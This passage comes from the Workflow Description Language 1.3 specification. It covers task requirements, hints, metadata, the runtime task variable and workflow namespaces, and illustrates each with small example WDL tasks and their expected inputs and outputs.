"test_containers.multi_greeting": "hello"
}
The execution engine must cause the task to fail immediately if it is not able to resolve at least one of the URIs to a runnable container.
๐ docker is supported as an alias for container with the exact same semantics. Exactly one of the container or docker attributes is required. The docker alias is deprecated and will be removed in WDL 2.0.
cpu
- Accepted types:
IntFloat
- Default value:
1
The cpu attribute defines the minimum number of CPU cores required for this task, which must be available prior to instantiating the command. The execution engine must provision at least the requested number of CPU cores, but it may provision more. For example, if the request is cpu: 0.5 but only discrete values are supported, then the execution engine might choose to provision 1.0 CPU instead.
Example: test_cpu_task.wdl
version 1.3
task test_cpu {
command <<<
cat /proc/cpuinfo | grep processor | wc -l
>>>
output {
Boolean at_least_two_cpu = read_int(stdout()) >= 2
}
requirements {
container: "ubuntu:latest"
cpu: 2
}
}
version 1.3
task test_cpu {
command <<<
cat /proc/cpuinfo | grep processor | wc -l
>>>
output {
Boolean at_least_two_cpu = read_int(stdout()) >= 2
}
requirements {
container: "ubuntu:latest"
cpu: 2
}
}
Example input:
{}
Example output:
{
"test_cpu.at_least_two_cpu": true
}
Test config:
{
"capabilities": ["cpu"]
}
memory
- Accepted types:
Int: Bytes of RAM.String: A decimal value with, optionally with a unit suffix.
- Default value:
2 GiB
The memory attribute defines the minimum memory (RAM) required for this task, which must be available prior to instantiating the command. The execution engine must provision at least the requested amount of memory, but it may provision more. For example, if the request is 1 GB but only blocks of 4 GB are available, then the execution engine might choose to provision 4.0 GB instead.
Example: test_memory_task.wdl
version 1.3
task test_memory {
command <<<
free --bytes -t | tail -1 | sed -E 's/\s+/\t/g' | cut -f 2
>>>
output {
Boolean at_least_two_gb = read_int(stdout()) >= (2 * 1024 * 1024 * 1024)
}
requirements {
memory: "2 GiB"
}
}
version 1.3
task test_memory {
command <<<
free --bytes -t | tail -1 | sed -E 's/\s+/\t/g' | cut -f 2
>>>
output {
Boolean at_least_two_gb = read_int(stdout()) >= (2 * 1024 * 1024 * 1024)
}
requirements {
memory: "2 GiB"
}
}
Example input:
{}
Example output:
{
"test_memory.at_least_two_gb": true
}
Test config:
{
"capabilities": ["memory"]
}
Hardware Accelerators (gpu and fpga)
fpga as of version 1.2
- Accepted type:
Boolean - Default value:
false
The gpu and fpga attributes indicate to the execution engine whether a task requires a GPU and/or FPGA accelerator to run to completion. The execution engine must guarantee that at least one of each of the request types of accelerators is available or immediately fail the task prior to instantiating the command.
The gpu and fpga hints can be used to request specific attributes for the provisioned accelerators (e.g., quantity, model, driver version).
Example: test_gpu_task.wdl
version 1.3
task test_gpu {
command <<<
lspci -nn | grep ' \[03..\]: ' | wc -l
>>>
output {
Boolean at_least_one_gpu = read_int(stdout()) >= 1
}
requirements {
container: "ubuntu:latest"
gpu: true
}
}
version 1.3
task test_gpu {
command <<<
lspci -nn | grep ' \[03..\]: ' | wc -l
>>>
output {
Boolean at_least_one_gpu = read_int(stdout()) >= 1
}
requirements {
container: "ubuntu:latest"
gpu: true
}
}
Example input:
{}
Example output:
{
"test_gpu.at_least_one_gpu": true
}
Test config:
{
"capabilities": ["gpu"],
"ignore": true
}
disks
- Accepted types:
Int: Amount disk space to request, inGiB.String: A disk specification - one of the following:"<size>": Amount of disk space to request, inGiB."<size> <units>": Amount of disk space to request, in the given units."<mount-point> <size>": A mount point and the amount of disk space to request, inGiB."<mount-point> <size> <units>": A mount point and the amount of disk space to request, in the given units.
Array[String]- An array of disk specifications.
- Default value:
1 GiB
The disks attribute provides a way to request one or more persistent volumes, each of which has a minimum size and is mounted at a specific location with both read and write permissions. When the disks attribute is provided, the execution engine must guarantee the requested resources are available or immediately fail the task prior to instantiating the command.
If the mount point is omitted, it is assumed to be a persistent volume mounted at the root of the execution directory within a task.
If a mount point is specified, then it must be an absolute path to a location in the execution environment (i.e., within the container). The specified path either must not already exist in the execution environment, or it must be empty and have at least the requested amount of space available. The mount point should be assumed to be ephemeral, i.e., it will be deleted after the task completes.
The execution engine is free to provision any class(es) of persistent volume it has available (e.g., SSD or HDD). The disks hint hint can be used to request specific attributes for the provisioned disks.
Example: one_mount_point_task.wdl
version 1.3
task one_mount_point {
command <<<
findmnt -bno size /mnt/outputs
>>>
output {
Boolean at_least_ten_gb = read_int(stdout()) >= (10 * 1024 * 1024 * 1024)
}
requirements {
disks: "/mnt/outputs 10 GiB"
container: "ubuntu"
}
}
version 1.3
task one_mount_point {
command <<<
findmnt -bno size /mnt/outputs
>>>
output {
Boolean at_least_ten_gb = read_int(stdout()) >= (10 * 1024 * 1024 * 1024)
}
requirements {
disks: "/mnt/outputs 10 GiB"
container: "ubuntu"
}
}
Example input:
{}
Example output:
{
"one_mount_point.at_least_ten_gb": true
}
Test config:
{
"capabilities": ["disks"]
}
If an array of disk specifications is used to specify multiple disk mounts, only one of them is allowed to omit the mount point.
Example: multi_mount_points_task.wdl
version 1.3
task multi_mount_points {
command <<<
findmnt -bno size /
>>>
output {
Boolean at_least_two_gb = read_int(stdout()) >= (2 * 1024 * 1024 * 1024)
}
requirements {
# The first value will be mounted at the execution root
disks: ["2", "/mnt/outputs 4 GiB", "/mnt/tmp 1 GiB"]
}
}
version 1.3
task multi_mount_points {
command <<<
findmnt -bno size /
>>>
output {
Boolean at_least_two_gb = read_int(stdout()) >= (2 * 1024 * 1024 * 1024)
}
requirements {
# The first value will be mounted at the execution root
disks: ["2", "/mnt/outputs 4 GiB", "/mnt/tmp 1 GiB"]
}
}
Example input:
{}
Example output:
{
"multi_mount_points.at_least_two_gb": true
}
Test config:
{
"capabilities": ["disks"]
}
max_retries
- Accepted type:
Int - Default value:
0 - Alias:
maxRetries
The max_retries attribute specifies the maximum number of times a task should be retried in the event of failure. The execution engine must retry the task at least once and up to (but not exceeding) the specified number of attempts.
The execution engine may choose to define an upper bound (>= 1) on the number of retry attempts that it permits.
A value of 0 means that the task as not retryable, and therefore any failure in the task should never result in a retry by the execution engine, and the final status of the task should remain the same.
task max_retries_test {
#.....
requirements {
max_retries: 4
}
}
return_codes
- Accepted types:
"*": This special value indicates that ALL returnCodes should be considered a success.Int: Only the specified return code should be considered a success.Array[Int]: Any of the return codes specified in the array should be considered a success.
- Default value:
0 - Alias:
returnCodes
The return_codes attribute specifies the return code, or set of return codes, that indicates a successful execution of a task. If the task exits with one of the specified return codes, it must be considered successful if possible (i.e., assuming all output expressions are evaluated successfully).
Example: single_return_code_task.wdl
version 1.3
task single_return_code {
command <<<
exit 1
>>>
requirements {
return_codes: 1
}
}
version 1.3
task single_return_code {
command <<<
exit 1
>>>
requirements {
return_codes: 1
}
}
Example input:
{}
Example output:
{}
Test config:
{
"return_code": 0
}
Example: multi_return_code_fail_task.wdl
version 1.3
task multi_return_code {
command <<<
exit 42
>>>
requirements {
return_codes: [1, 2, 5, 10]
}
}
version 1.3
task multi_return_code {
command <<<
exit 42
>>>
requirements {
return_codes: [1, 2, 5, 10]
}
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true,
"return_code": 42
}
Example: all_return_codes_task.wdl
version 1.3
task all_return_codes {
command <<<
exit 42
>>>
requirements {
return_codes: "*"
}
}
version 1.3
task all_return_codes {
command <<<
exit 42
>>>
requirements {
return_codes: "*"
}
}
Example input:
{}
Example output:
{}
Test config:
{
"return_code": 0
}
Hints Section
as of version 1.2
The hints section is optional and may contain any number of attributes (key/value pairs) that provide hints to the execution engine. A hint provides additional context that the execution engine can use to optimize the execution of the task. The execution engine may also ignore any hint for any reason. A task execution never fails due to the inability of the execution engine to recognize or satisfy a hint.
Hints-scoped types
There are three scoped types that must be declared by the execution engine within the hints section. These types are intentionally given names that are already reserved keywords so that they don't conflict with any user-defined types.
The hints type is similar to Object in that it can contain arbitrary key-value pairs. However, the members of a hints object must have the same semantics as the hints section itself (i.e., any reserved hints must have the same types and allowed values), and the hints type cannot be nested (i.e., a member of a hints object may not have a hints type value). The hints type is primarily intended to be used to define the inputs, outputs, and compute environment attributes.
The input and output types are similar to Structs whose member names are identical to the names of the enclosing task's input and output variables, respectively, and whose member values are all of type hints. However, unlike Structs, the keys of input and output literals may use dotted notation to refer to nested members of input and output Structs. See inputs and outputs for examples.
Reserved Task Hints
The following hints are reserved. An implementation is not required to support these attributes, but if it does support a reserved attribute it must enforce the semantics and allowed values defined below. The purpose of reserving these hints is to encourage interoperability of tasks and workflows between different execution engines.
Example: test_hints_task.wdl
version 1.3
task test_hints {
input {
File foo
}
command <<<
wc -l < ~{foo}
>>>
output {
Int num_lines = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
hints {
max_memory: "36 GB"
max_cpu: 24
short_task: true
localization_optional: false
inputs: input {
foo: hints {
localization_optional: true
}
}
}
}
version 1.3
task test_hints {
input {
File foo
}
command <<<
wc -l < ~{foo}
>>>
output {
Int num_lines = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
hints {
max_memory: "36 GB"
max_cpu: 24
short_task: true
localization_optional: false
inputs: input {
foo: hints {
localization_optional: true
}
}
}
}
Example input:
{
"test_hints.foo": "data/greetings.txt"
}
Example output:
{
"test_hints.num_lines": 3
}
max_cpu
- Accepted types:
IntFloat
- Alias:
maxCpu
A hint to the execution engine that the task expects to use no more than the specified number of CPUs. The value of this hint has the same specification as requirements.cpu.
max_memory
- Accepted types:
Int: Bytes of RAM.String: A decimal value with, optionally with a unit suffix.
- Alias:
maxMemory
A hint to the execution engine that the task expects to use no more than the specified amount of memory. The value of this hint has the same specification as requirements.memory.
disks
as of version 1.2
- Accepted types:
String: Disk specification.Map[String, String]: Map of mount point to disk specification.
A hint to the execution engine to mount disks with specific attributes. The value of this hint can be a String with a specification that applies to all mount points, or a Map with the key being the mount point and the value being a String with the specification for that mount point.
Volume specifications are left intentionally vague as they are primarily intented to be used in the context of a specific compute environment. The values "HDD" and "SSD" should be recognized to indicate that a specific class of hardware is being requested.
gpu and fpga
as of version 1.2
- Accepted types:
Int: Minimum number of accelerators being requested.String: Specification for accelerator(s) being requested, e.g., manufacturer or model name.
A hint to the execution engine to provision hardware accelerators with specific attributes. Accelerator specifications are left intentionally vague as they are primarily intended to be used in the context of a specific compute environment.
short_task
- Accepted types:
Boolean - Default value:
false
A hint to the execution engine about the expected duration of this task. The value of this hint is a Boolean for which true indicates that that this task is not expected to take long to execute, which the execution engine can interpret as permission to optimize the execution of the task.
For example, the engine may batch together multiple short_tasks, or it may use the cost-optimized instance types that many cloud vendors provide, e.g., preemptible instances on GCP and spot instances on AWS.
localization_optional
- Accepted types:
Boolean - Default value:
false - Alias:
localizationOptional
A hint to the execution engine about whether the File inputs for this task need to be localized prior to executing the task. The value of this hint is a Boolean for which true indicates that the contents of the File inputs may be streamed on demand.
For example, a task that processes its input file once in linear fashion could have that input streamed (e.g., using a fifo) rather than requiring the input file to be fully localized prior to execution.
inputs
- Accepted types:
input
Provides input-specific hints. Each key must refer to a parameter defined in the task's input section. A key may also used dotted notation to refer to a specific member of a struct input.
Example: input_hint_task.wdl
version 1.3
struct Person {
String name
File? cv
}
task input_hint {
input {
Person person
}
command <<<
if ~{defined(person.cv)}; then
grep "WDL" ~{person.cv}
fi
>>>
output {
Array[String] experience = read_lines(stdout())
}
hints {
inputs: input {
person.name: hints {
min_length: 3
},
person.cv: hints {
localization_optional: true
}
}
outputs: output {
experience: hints {
max_length: 5
}
}
}
}
version 1.3
struct Person {
String name
File? cv
}
task input_hint {
input {
Person person
}
command <<<
if ~{defined(person.cv)}; then
grep "WDL" ~{person.cv}
fi
>>>
output {
Array[String] experience = read_lines(stdout())
}
hints {
inputs: input {
person.name: hints {
min_length: 3
},
person.cv: hints {
localization_optional: true
}
}
outputs: output {
experience: hints {
max_length: 5
}
}
}
}
Example input:
{
"input_hint.person": {
"name": "Joe"
}
}
Example output:
{
"input_hint.experience": []
}
Reserved input-specific attributes:
inputs.<key>.localization_optional: Indicates that a specificFileinput does not need to be localized prior to executing this task. This attribute has the same semantics as the task-level localization_optional hint.
outputs
- Accepted types:
output
Provides output-specific hints. Each key must refer to a parameter defined in the task's output section. A key may also use dotted notation to refer to a specific member of a struct output.
Compute Environments
The hints section should be used to provide hints that are specific to different compute environments such as HPC systems or cloud platforms. Attributes for a compute environment should be specified in a hints value, in which any of the reserved hints are allowed to override the values specified at the task level (if any), and other attributes are platform-specific.
task foo {
...
requirements {
gpu: true
}
hints {
aws: hints {
instance_type: "p5.48xlarge"
}
gcp: hints {
gpu: 2
}
azure: hints {
...
}
alibaba: hints {
...
}
}
}
Conventions and Best Practices
To encourage interoperable workflows, WDL authors and execution engine implementors should view hints strictly as runtime optimizations. Hints must not be interpreted as requirements. Following this principle will ensure that a workflow is runnable on all platforms (assuming the requirements section has the required attributes) regardless of whether it contains any additional hints.
Please observe the following guidelines when using hints:
- A hint must never be required for successful task execution.
- Before adding a new hint, ask yourself "do I really need another hint, or is there a better way to specify the behavior I require?".
- Avoid unnecessary complexity. By allowing any arbitrary keys and compound values, it is possible for the
hintssection to become quite complex. Use the simplest value possible to achieve the desired outcome. - Sharing is caring. Users tend to look for similar behavior between different execution engines. It is strongly encouraged that implementers of execution engines agree on common names and accepted values for hints that describe common usage patterns. Compute environments are a good example of hints that have conventions attached to them.
๐ Runtime Section
The runtime section is essentially the same as the requirements section, with the only difference being that arbitrary attributes are allowed in the runtime section. All attributes defined in the requirements section have the same semantics when used in the runtime section and are considered as reserved.
The runtime section is mutually exclusive with requirements and hints, i.e., if you use runtime in a task, you cannot also use requirements or hints in that task.
The runtime section is deprecated and will be removed in WDL 2.0.
Metadata Sections
There are two optional sections that can be used to store metadata with the task: meta and parameter_meta. These sections are intended to contain metadata that is only of interest to human readers. The engine can ignore these sections with no loss of correctness. The extra information can be used, for example, to generate a user interface or documentation.
Meta Values
The metadata sections can contain arbitrary key/value pairs. However, the values allowed in these sections ("meta values") are different than in other sections:
- Only string, numeric, and boolean primitives are allowed.
- Only array and object compound values are allowed.
- The special value
nullis allowed for undefined attributes. - Expressions are not allowed.
A meta object is similar to a struct literal, except:
- A
Structtype name is not required. - Its values must conform to the same metadata rules defined above.
Note that, unlike the WDL Object type, metadata objects are not deprecated and will continue to be supported in future versions.
Example: test_meta_values.wdl
version 1.3
workflow test_meta_values {
meta {
authors: ["Jim", "Bob"]
version: 1.1
citation: {
year: 2020,
doi: "1234/10.1010"
}
}
}
version 1.3
workflow test_meta_values {
meta {
authors: ["Jim", "Bob"]
version: 1.1
citation: {
year: 2020,
doi: "1234/10.1010"
}
}
}
Example input:
{}
Example output:
{}
Task Metadata Section
This section contains task-level metadata. For example: author and contact email.
Parameter Metadata Section
This section contains metadata specific to input and output parameters. Any key in this section must correspond to a task input or output.
Example: ex_paramter_meta_task.wdl
version 1.3
task ex_paramter_meta {
input {
File infile
Boolean lines_only = false
String? region
}
meta {
description: "A task that counts the number of words/lines in a file"
}
parameter_meta {
infile: {
help: "Count the number of words/lines in this file"
}
lines_only: {
help: "Count only lines"
}
region: {
help: "Cloud region",
suggestions: ["us-west", "us-east", "asia-pacific", "europe-central"]
}
}
command <<<
wc ~{if lines_only then '-l' else ''} < ~{infile}
>>>
output {
Int result = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task ex_paramter_meta {
input {
File infile
Boolean lines_only = false
String? region
}
meta {
description: "A task that counts the number of words/lines in a file"
}
parameter_meta {
infile: {
help: "Count the number of words/lines in this file"
}
lines_only: {
help: "Count only lines"
}
region: {
help: "Cloud region",
suggestions: ["us-west", "us-east", "asia-pacific", "europe-central"]
}
}
command <<<
wc ~{if lines_only then '-l' else ''} < ~{infile}
>>>
output {
Int result = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{
"ex_paramter_meta.infile": "data/greetings.txt",
"ex_paramter_meta.lines_only": true
}
Example output:
{
"ex_paramter_meta.result": 3
}
Runtime Access to Requirements, Hints, and Metadata
The requirements and hints sections comprise resource requests to the execution engine. But these requests can be specified or overridden at runtime, and the execution engine has some latitude in whether and how it fulfills them. Thus, the workflow developer may wish to know exactly what resources are available at runtime, such as:
- What are the actual resource allocations. For example, a task may request at least
8 GiBof memory but may be able to use more memory if it is available. - The task metadata, to avoid duplication. For example, the task may wish to write log messages with the task's name and description without having to duplicate the information in the task's
metasection. - The runtime engine may also choose to provide additional information at runtime.
This information is provided by the task variable, which is implicitly defined by the execution engine. The type of task is a scoped type with the following members:
name: AStringwith the task name.id: AStringwith the unique ID of the task. The execution engine may choose the format for this ID, but it is suggested to include at least the following information:- The task name
- The task alias, if it differs from the task name
- The index of the task instance, if it is within a scatter statement
container: AString?with the URI of the container in which the task is executing as aString, orNoneif the task is being executed in the host environment.cpu: AFloatwith the allocated number of cpus. Must be greater than0.memory: AnIntwith the allocated memory in bytes. Must be greater than0.gpu: AnArray[String]with one specification per allocated GPU. The specification is execution engine-specific. If no GPUs were allocated, then the value must be an empty array.fpga: AnArray[String]with one specification per allocated FPGA. The specification is execution engine-specific. If no FPGAs were allocated, then the value must be an empty array.disks: AMap[String, Int]with one entry for each disk mount point. The key is the mount point and the value is the initial amount of disk space allocated, in bytes. The execution engine must, at a minimum, provide one entry for each disk mount point requested, but may provide more. The amount of disk space available for a given mount point may increase during the lifetime of the task (e.g., autoscaling volumes provided by some cloud services).max_retriesโจ: AnIntwith the maximum number of retry attempts.attempt: AnIntwith the current task attempt. The value must be0the first time the task is executed, and incremented by1each time the task is retried (if any).previousโจ: A hidden type containing the computed requirements from the previous task attempt. All fields areNoneon the first try.end_time: AnInt?whose value is the time by which the task must be completed, as a Unix time stamp. A value of0means that the execution engine does not impose a time limit. A value ofNonemeans that the execution engine cannot determine whether the runtime of the task is limited. A positive value is a guarantee that the task will be preempted at the specified time, but is not a guarantee that the task won't be preempted earlier.meta: AnObjectcontaining a copy of the task'smetasection, or the emptyObjectif there is nometasection or if it is empty.parameter_meta: AnObjectcontaining a copy of the task'sparameter_metasection, or the emptyObjectif there is noparameter_metasection or if it is empty.ext: AnObjectcontaining execution engine-specific attributes, or the emptyObjectif there aren't any. Members ofextshould be considered optional. It is recommended to only access a member ofextusing string interpolation to avoid an error if it is not defined.
If the runtime engine is not able to provide the actual value of a requirement, then it must provide the requested value instead, or the default value if no specific value was requested.
Output-Only Task Members
The following members of the task variable are only available in the output section, after the command has completed execution:
return_code: AnIntwith the value of thecommand's return code.
Example: test_runtime_info_task.wdl
version 1.3
task test_runtime_info {
meta {
description: "Task that shows how to use the implicit 'task' declaration"
}
command <<<
echo "Task name: ~{task.name}"
echo "Task description: ~{task.meta.description}"
echo "Task container: ~{task.container}"
echo "Available cpus: ~{task.cpu}"
echo "Available memory: ~{task.memory / (1024 * 1024 * 1024)} GiB"
exit 1
>>>
output {
Boolean at_least_two_gb = task.memory >= (2 * 1024 * 1024 * 1024)
Int? return_code = task.return_code
}
requirements {
container: ["ubuntu:latest", "quay.io/ubuntu:focal"]
memory: "2 GiB"
return_codes: [0, 1]
}
}
version 1.3
task test_runtime_info {
meta {
description: "Task that shows how to use the implicit 'task' declaration"
}
command <<<
echo "Task name: ~{task.name}"
echo "Task description: ~{task.meta.description}"
echo "Task container: ~{task.container}"
echo "Available cpus: ~{task.cpu}"
echo "Available memory: ~{task.memory / (1024 * 1024 * 1024)} GiB"
exit 1
>>>
output {
Boolean at_least_two_gb = task.memory >= (2 * 1024 * 1024 * 1024)
Int? return_code = task.return_code
}
requirements {
container: ["ubuntu:latest", "quay.io/ubuntu:focal"]
memory: "2 GiB"
return_codes: [0, 1]
}
}
Example input:
{}
Example output:
{
"test_runtime_info.at_least_two_gb": true,
"test_runtime_info.return_code": 1
}
Test config:
{
"capabilities": ["cpu", "memory"]
}
Only a limited subset of the task variable members (name, id, attempt, previous, meta, parameter_meta, and ext) are available in pre-evaluation contexts (requirements, hints, and the deprecated runtime sections). The full set of members, including all computed requirements, are available in post-evaluation contexts (command and output sections).
Example: test_task_previous.wdl
version 1.3
task test_task_previous {
requirements {
# Only name, id, attempt, previous, meta, parameter_meta, and ext are available in pre-evaluation
cpu: task.attempt + 1
memory: "~{256 * (2 ** task.attempt)} MB"
container: "ubuntu:latest"
max_retries: 1
}
command <<<
echo "Attempt: ~{task.attempt}"
echo "CPU: ~{task.cpu}"
echo "Memory: ~{task.memory}"
echo "Previous CPU: ~{select_first([task.previous.cpu, 0])}"
echo "Previous Memory: ~{select_first([task.previous.memory, 0])}"
# Fail on first attempt
if [ ~{task.attempt} -eq 0 ]; then
exit 1
fi
>>>
output {
# All task fields are available in output
Int attempt = task.attempt
Float cpu = task.cpu
Int memory = task.memory
Float? previous_cpu = task.previous.cpu
Int? previous_memory = task.previous.memory
}
}
version 1.3
task test_task_previous {
requirements {
# Only name, id, attempt, previous, meta, parameter_meta, and ext are available in pre-evaluation
cpu: task.attempt + 1
memory: "~{256 * (2 ** task.attempt)} MB"
container: "ubuntu:latest"
max_retries: 1
}
command <<<
echo "Attempt: ~{task.attempt}"
echo "CPU: ~{task.cpu}"
echo "Memory: ~{task.memory}"
echo "Previous CPU: ~{select_first([task.previous.cpu, 0])}"
echo "Previous Memory: ~{select_first([task.previous.memory, 0])}"
# Fail on first attempt
if [ ~{task.attempt} -eq 0 ]; then
exit 1
fi
>>>
output {
# All task fields are available in output
Int attempt = task.attempt
Float cpu = task.cpu
Int memory = task.memory
Float? previous_cpu = task.previous.cpu
Int? previous_memory = task.previous.memory
}
}
Example input:
{}
Example output:
{
"test_task_previous.attempt": 1,
"test_task_previous.cpu": 2.0,
"test_task_previous.memory": 512000000,
"test_task_previous.previous_cpu": 1.0,
"test_task_previous.previous_memory": 256000000
}
If a task is using the deprecated runtime section rather than requirements and hints, then the runtime values of the reserved runtime attributes (i.e., the ones that appear in the requirements section) are populated in the requirements member.
Workflow Definition
A workflow can be thought of as a directed acyclic graph (DAG) of transformations that convert the input data to the desired outputs. Rather than explicitly specifying the sequence of operations, a WDL workflow instead describes the connections between the steps in the workflow (i.e., between the nodes in the graph). It is the responsibility of the execution engine to determine the proper ordering of the workflow steps, and to orchestrate the execution of the different steps.
A workflow is defined using the workflow keyword, followed by a workflow name that is unique within its WDL document, followed by any number of workflow elements within braces.
workflow name {
input {
# workflow inputs are declared here
}
# other "private" declarations can be made here
# there may be any number of (potentially nested)
# calls, scatters, or conditionals
call target { ... }
scatter (i in collection) { ... }
if (condition) { ... }
output {
# workflow outputs are declared here
}
hints {
# workflow hints are declared here
}
meta {
# workflow-level metadata can go here
}
parameter_meta {
# metadata about each input/output parameter can go here
}
}
Workflow Elements
Tasks and workflows have several elements in common. When applicable, the task definition for these sections is linked to rather than duplicated.
A workflow is comprised of the following elements:
- A single, optional
inputsection (identical to theinputsection within tasks). - Any number of workflow execution elements, which include the following:
- A private declaration (identical to private declarations within tasks).
- A
callstatement, which invokes tasks or subworkflows. - A
scatterstatement, which enables parallelized of workflow execution elements across collections. - A conditional (
if) statement, which enables conditional execution of workflow execution elements.
- A single, optional
outputsection (identical to theoutputsection within tasks). - A single, optional
metasection (identical to themetasection within tasks). - A single, optional
parameter_metasection (identical to theparameter_metasection within tasks).
There is no enforced order for workflow elements.
Evaluation of Workflow Elements
As with tasks, declarations can appear in the body of a workflow in any order. Expressions in workflows can reference the outputs of calls, including in input declarations. For example:
Example: input_ref_call.wdl
version 1.3
task double {
input {
Int int_in
}
command <<< >>>
output {
Int out = int_in * 2
}
}
workflow input_ref_call {
input {
Int x
Int y = d1.out
}
call double as d1 { int_in = x }
call double as d2 { int_in = y }
output {
Int result = d2.out
}
}
version 1.3
task double {
input {
Int int_in
}
command <<< >>>
output {
Int out = int_in * 2
}
}
workflow input_ref_call {
input {
Int x
Int y = d1.out
}
call double as d1 { int_in = x }
call double as d2 { int_in = y }
output {
Int result = d2.out
}
}
Example input:
{
"input_ref_call.x": 5
}
Example output:
{
"input_ref_call.result": 20
}
The control flow of this workflow changes depending on whether the value of y is provided as an input or it's initializer expression is evaluated:
- If an input value is provided for
ythen it receives that value immediately andd2may start running as soon as the workflow starts. - In no input value is provided for
ythen it will need to wait ford1to complete before it is assigned.
Fully Qualified Names & Namespaced Identifiers
A fully qualified name is the unique identifier of any particular call, input, or output, and has the following structure:
- For
calls:<parent namespace>.<call alias> - For inputs and outputs:
<parent namespace>.<input or output name> - For
Structs andObjects:<parent namespace>.<member name>
A namespace is a set of names, such that every name is unique within the namespace (but the same name could be used in two different namespaces). The parent namespace is the fully qualified name of the workflow containing the call, the workflow or task containing the input or output declaration, or the Struct or Object declaration containing the member. For the top-level workflow this is equal to the workflow name.
For example: ns.ns2.mytask is a fully-qualified name - ns.ns2 is the parent namespace, and mytask is the task name being referred to within that namespace. Fully-qualified names are left-associative, meaning ns.ns2.mytask is interpreted as ((ns.ns2).mytask), meaning ns.ns2 has to resolve to a namespace so that .mytask can be applied.
When a call statement needs to refer to a task or workflow in another namespace, then it must use the fully-qualified name of that task or workflow. When an expression needs to refer to a declaration in another namespace, it must use a namespaced identifier, which is an identifier consisting of a fully-qualified name.
Example: call_imported.wdl
version 1.3
import "input_ref_call.wdl" as ns1
workflow call_imported {
input {
Int x
Int y = d1.out
}
call ns1.double as d1 { int_in = x }
call ns1.double as d2 { int_in = y }
output {
Int result = d2.out
}
}
version 1.3
import "input_ref_call.wdl" as ns1
workflow call_imported {
input {
Int x
Int y = d1.out
}
call ns1.double as d1 { int_in = x }
call ns1.double as d2 { int_in = y }
output {
Int result = d2.out
}
}
Example input:
{
"call_imported.x": 5
}
Example output:
{
"call_imported.result": 20
}
The workflow in the above example imports the WDL file from the previous section using an alias. The import creates the namespace ns1, and the workflow calls a task in the imported namespace using its fully qualified name, ns1.double. Each call is aliased, and the alias is used to refer to the output of the task, e.g., d1.out (see the Call Statement section for details on call aliasing).
In the following more extensive example, all of the fully-qualified names that exist within the top-level workflow are listed exhaustively.
Example: main.wdl
version 1.3
import "other.wdl" as other_wf
task echo {
input {
String msg = "hello"
}
command <<<
printf '~{msg}\n'
>>>
output {
File results = stdout()
}
requirements {
container: "ubuntu:latest"
}
}
workflow main {
Array[String] arr = ["a", "b", "c"]
call echo
call echo as echo2
call other_wf.foobar { infile = echo2.results }
call other_wf.other { b = true, f = echo2.results }
call other_wf.other as other2 { b = false }
scatter(x in arr) {
call echo as scattered_echo {
msg = x
}
String scattered_echo_results = read_string(scattered_echo.results)
}
output {
String echo_results = read_string(echo.results)
Int foobar_results = foobar.results
Array[String] echo_array = scattered_echo_results
}
}
version 1.3
import "other.wdl" as other_wf
task echo {
input {
String msg = "hello"
}
command <<<
printf '~{msg}\n'
>>>
output {
File results = stdout()
}
requirements {
container: "ubuntu:latest"
}
}
workflow main {
Array[String] arr = ["a", "b", "c"]
call echo
call echo as echo2
call other_wf.foobar { infile = echo2.results }
call other_wf.other { b = true, f = echo2.results }
call other_wf.other as other2 { b = false }
scatter(x in arr) {
call echo as scattered_echo {
msg = x
}
String scattered_echo_results = read_string(scattered_echo.results)
}
output {
String echo_results = read_string(echo.results)
Int foobar_results = foobar.results
Array[String] echo_array = scattered_echo_results
}
}
Example input:
{}
Example output:
{
"main.echo_results": "hello",
"main.foobar_results": 1,
"main.echo_array": ["a", "b", "c"]
}
Example: other.wdl
version 1.3
task foobar {
input {
File infile
}
command <<<
wc -l < ~{infile}
>>>
output {
Int results = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
workflow other {
input {
Boolean b = false
File? f
}
if (b && defined(f)) {
call foobar { infile = select_first([f]) }
}
output {
Int? results = foobar.results
}
}
version 1.3
task foobar {
input {
File infile
}
command <<<
wc -l < ~{infile}
>>>
output {
Int results = read_int(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
workflow other {
input {
Boolean b = false
File? f
}
if (b && defined(f)) {
call foobar { infile = select_first([f]) }
}
output {
Int? results = foobar.results
}
}
Example input:
{
"other.b": true,
"other.f": "data/greetings.txt"
}
Example output:
{
"other.results": 3
}
The following fully-qualified names exist when calling workflow main in main.wdl:
| Fully-qualified Name | References | Accessible |
|---|---|---|
other_wf | Namespace created by importing other.wdl and aliasing it | Anywhere in main.wdl |
main | Top-level workflow | By the caller of main |
main.arr | Array[String] declaration on the workflow | Anywhere within main |
main.echo | First call to task echo | Anywhere within main |
main.echo2 | Second call to task echo (aliased as echo2) | Anywhere within main |
main.echo.msg | String input of first call to task echo | No* |
main.echo.results | File output of first call to task echo | Anywhere within main |
main.echo2.msg | String input of second call to task echo | No* |
main.echo2.results | File output of second call to task echo | Anywhere within main |
main.foobar.infile | File input of the call to other_wf.foobar | No* |
main.foobar.results | Int output of the call to other_wf.foobar | Anywhere within main |
main.other | First call to subworkflow other_wf.other | Anywhere within main |
main.other.b | Boolean input of the first call to subworkflow other_wf.other | No* |
main.other.f | File input of the first call to subworkflow other_wf.other | No* |
main.other.foobar.infile | File input of the call to foobar inside the first call to subworkflow other_wf.other | No* |
main.other.foobar.results | Int output of the call to foobar inside the first call to subworkflow other_wf.other | No |
main.other.results | Int? output of the first call to subworkflow other_wf.other | Anywhere within main |
main.other2 | Second call to subworkflow other_wf.other (aliased as other2) | Anywhere within main |
main.other2.b | Boolean input of the second call to subworkflow other_wf.other | No* |
main.other2.f | File input of the second call to subworkflow other_wf.other` | No* |
main.other2.foobar.infile | File input of the call to foobar inside the second call to subworkflow other_wf.other | No* |
main.other2.foobar.results | Int output of the call to foobar inside the second call to subworkflow other_wf.other | No |
scattered_echo | Call to echo within scatter of main | Within the scatter |
scattered_echo.results | File results of call to scattered_echo` | Within the scatter |
main.scattered_echo.msg | Array of String inputs to calls to scattered_echo | No* |
main.scattered_echo.results | Array of File results of calls to echo within the scatter | Anywhere within main |
scattered_echo_results | String contents of File created by call to scattered_echo | Within the scatter |
main.scattered_echo_results | Array of String contents of File results of calls to echo within the scatter | Anywhere within main |
main.echo_results | String contents of File result from call to echo | Anywhere in main's output section and by the caller of main |
